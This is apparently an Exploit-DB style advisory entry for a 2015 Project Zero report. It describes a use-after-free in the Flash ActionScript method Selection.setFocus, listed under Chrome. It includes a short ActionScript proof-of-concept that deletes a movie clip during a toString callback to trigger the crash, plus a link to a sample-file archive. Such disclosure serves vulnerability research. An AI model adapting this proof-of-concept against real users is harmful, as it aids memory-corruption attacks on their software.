User-after-free in Selection.setFocus

vendor:

Chrome

by:

Project Zero

7,5

CVSS

HIGH

Use-after-free

416

CWE

Product Name: Chrome

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: 64-bit Linux

2015

User-after-free in Selection.setFocus

There is a user-after-free in Selection.setFocus. It is a static method, but if it is called with a this object, it will be called on that object's thread. Then, if it calls into script, for example, by calling toString on the string parameter, the object, and its thread will be deleted, and a use-after-free occurs.

Mitigation:

Ensure that objects are not deleted while they are still in use.

Source

Exploit-DB raw data:

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=841

There is a user-after-free in Selection.setFocus. It is a static method, but if it is called with a this object, it will be called on that object's thread. Then, if it calls into script, for example, by calling toString on the string parameter, the object, and its thread will be deleted, and a use-after-free occurs.

A minimal PoC follows:

var mc = this.createEmptyMovieClip( "mc", 1);
var f = Selection.setFocus;
mc.f = f;
mc.f({toString : func});

function func(){
	
	mc.removeMovieClip();
	
        // Fix heap here

	}

A sample SWF and fla are attached. This PoC crashes in Chrome on 64-bit Linux


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40307.zip